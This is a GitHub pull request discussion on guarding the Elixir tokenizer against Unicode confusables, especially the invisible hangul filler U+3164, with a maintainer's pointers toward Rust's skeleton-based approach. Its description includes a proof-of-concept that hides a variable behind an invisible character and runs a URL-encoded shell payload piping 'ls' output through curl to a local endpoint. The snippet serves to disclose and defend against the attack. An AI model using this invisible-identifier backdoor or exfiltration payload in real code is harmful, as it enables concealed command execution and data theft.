Skip to content

Guard against confusables incl. hangul space #11410

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Conversation

mrluc
Copy link
Contributor

@mrluc mrluc commented Nov 21, 2021

EDIT: closed because solution that this PR had tested was overly-simplistic; see last 3 comments or so.

I took a pass at protecting against 'confusables', using the subset of Rust's list that are valid as .ex identifiers, and adding one character that Rust's list doesn't catch (hangul space). This would be to complement the recently-added protections against bidirectional characters.

This was just to get the ball rolling -- currently it raises, when maybe it should warn? Other considerations are noted at the end of the PR desc.

I got here kinda by accident; I was talking with someone about that 'hangul space' character enabling a neat supply-chain attack in javascript -- and I confirmed that it works in Elixir too, look for the invisible variable below in 1.13.0-rc.1:

payload = "%3B%20ls%20%7C%20curl%20--data-binary%20%40-%20http%3A%2F%2Flocalhost%3A8000"
external_query = "foo=bar&%E3%85%A4=#{payload}&baz=wow"

values =
  external_query
  |> Plug.Conn.Query.decode
  |> Map.values

[
  baz,
  foo,
] = values

looks_safe_enough = [
  "echo",
  "test", 
]

shell_from_apparently_non_external_inputs =
  looks_safe_enough
  |> Enum.join(" ")
  |> to_charlist

# should see the list of files posted to netcat here:
:os.cmd(shell_from_apparently_non_external_inputs)

Commented proof-of-concept gist showing how it could be exploited in .ex is here. Security-wise it feels okay to discuss in the open; the article I mentioned has done the rounds, 'trojan codes' has raised awareness generally, vendors like github are adding detections/warnings, the bidirectional chars PR was handled in the open, the PoC relies on a contrived scenario, etc.

I saw a comment on the 'bidirectional' PR that pointed at the Rust confusable protections; I processed that, filtered it down from several hundred to only the 48 that are valid identifiers in elixir, and added the hangul character from my PoC (google 'invisible backdoor javascript' for the original article I read on this) which the Rust list didn't include.

Notes:

  • this approach would add a much larger check than the bidirectional one -- with 48 clauses, which may be excessive
    • (though a lot less than the whole list of confusables; out of curiosity I ran the whole list through and 3K of those are valid identifiers in .ex, ie can make a variable with them; however that includes even normal ascii chars since eg. "m" can be confused with "rn").
  • we may want to whittle down the list -- some are arguably common japanese and hebrew characters -- some of which already appeared in string literals in string_test.exs (the CJK dash, and a Hebrew yod), so I omitted only those 2 from the Rust list.

* seen in article of same name
* hangul space (0x3164) has a PoC; others are the subset
  of rust's confusables that are currently valid as
  elixir identifiers, minus the few cjk and hebrew confusables
  that occurred unescaped in eg. string_test.exs
@josevalim
Copy link
Member

Thank you @mrluc. This looks a good direction. The place that you changed is related to strings. I assume we still want to allow those in strings, after all hangul space has correct uses in strings, and we want to restrict those only on variables an atoms, correct?

If so, the correct is to handle those files here:

https://github.com/elixir-lang/elixir/blob/main/lib/elixir/unicode/tokenizer.ex

Here would be the steps for adding this:

  1. Include confusables.txt in the list of Unicode files

  2. Change the file above to also parse confusables.txt (code in unicode/unicode.ex can be helpful) and do not allow all characters that are confusable

  3. Update Unicode Syntax doc to declare confusables are not allowed

@josevalim
Copy link
Member

Upon further inspection, it seems this list is incomplete. For example, is a valid variable name, where H is H in Cyrillic. Given how common those characters can be, we need to fully take Rust's approach here:

  1. Get a list of all confusables and their script
  2. If the same token has more than one confusable in different scripts, warn

To be clear then, both H (ascii) and Н (cyrillic) should be in the list of confusables. :)

@mrluc
Copy link
Contributor Author

mrluc commented Nov 21, 2021

@josevalim thanks for the pointers 🙏 may need to split addressing this PoC out from the concept of confusables (or add it as an exception/additional filter on top of more comprehensive confusables-handling PR, since Rust-style confusable handling may not catch it...)

Re: the proof-of-concept -- it seems like "a bug in unicode" and also "a bug in unicode's confusables.txt" -- because it visually looks like it should be categorized as whitespace, and as confusable with space, and it's not. For that, adding just a guard against \u3164 (in the fashion I saw done in the bidirectional chars PR) seemed to work. Based on this article.

Re: looking at what Rust's done:

we need to fully take Rust's approach here:

  • Get a list of all confusables and their script
  • If the same token has more than one confusable in different scripts, warn

I took a closer look at what Rust's done and I see that the file I had looked at was a bit of a red herring); I have a better idea now of what's involved -- accumulate a lookup of homoglyph 'skeletons' and warn on collisions.

This looks like the relevant Rust tracking issue -- a place where they discuss/link to the work of computing the 'skeleton' lookup for homoglyphs.

I like the distinction in your description -- the lookup is for tokens, not just for valid elixir identifiers, so assuming space is a token, then if \u3164 and 'space' have a collision it would catch it! But ... 'space' isn't one of the confusables for u3164 listed in confusables.txt, which again seems like a 'bug in confusables.txt' since they're visually identical by virtue of being pure whitespace).

@mrluc
Copy link
Contributor Author

mrluc commented Nov 21, 2021

Ah, cool, Rust warns of 'uncommon codepoints' by default (playground)

image

So whatever they do is probably 👍 .

If someone wants to grab earlier feel free, otherwise I can probably put some scheduled "shop time" for this next Thurs/Fri.

Edit: 'what rust does' seems to be 2-layered which seems cool

  • lookups based on confusables.txt will catch lots of stuff
  • 'uncommon codepoints' will probably catch all kinds of things (like this) which could otherwise sneak through the first, because confusables.txt can have holes/bugs/not be exhaustive, but probably have good coverage on highest-traffic chars

Anyway I'd probably want to look at the impl. for both of those.

@josevalim
Copy link
Member

Yes, the uncommon is a separate part which we should discuss separately (and confusables are more important IMO).

@mrluc mrluc closed this Nov 21, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Development

Successfully merging this pull request may close these issues.

2 participants